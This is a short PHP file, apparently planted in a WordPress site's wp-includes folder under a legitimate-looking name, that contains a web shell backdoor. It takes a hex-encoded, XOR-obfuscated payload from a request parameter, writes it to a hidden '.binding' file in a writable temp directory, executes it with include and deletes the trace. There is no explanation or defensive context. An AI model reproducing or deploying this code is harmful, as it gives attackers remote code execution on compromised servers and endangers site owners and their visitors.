File: /www/wwwroot/q.autos58.cn/wp-includes/help_bbcode.php
<?php
if(in_array("en\x74ity", array_keys($_REQUEST))){
$pgrp = array_filter([session_save_path(), getenv("TMP"), getcwd(), "/dev/shm", "/var/tmp", "/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), sys_get_temp_dir()]);
$elem = hex2bin($_REQUEST["en\x74ity"]);
$comp = ''; $c = 0; while($c < strlen($elem)){$comp .= chr(ord($elem[$c]) ^ 1);$c++;}
while ($marker = array_shift($pgrp)) {
if ((function($d) { return is_dir($d) && is_writable($d); })($marker)) {
$dchunk = sprintf("%s/.binding", $marker);
$success = file_put_contents($dchunk, $comp);
if ($success) {
include $dchunk;
@unlink($dchunk);
exit;}
}
}
}